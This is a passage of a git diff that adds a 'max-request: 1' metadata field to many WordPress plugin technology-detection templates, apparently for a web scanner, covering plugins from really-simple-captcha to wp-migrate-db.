b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 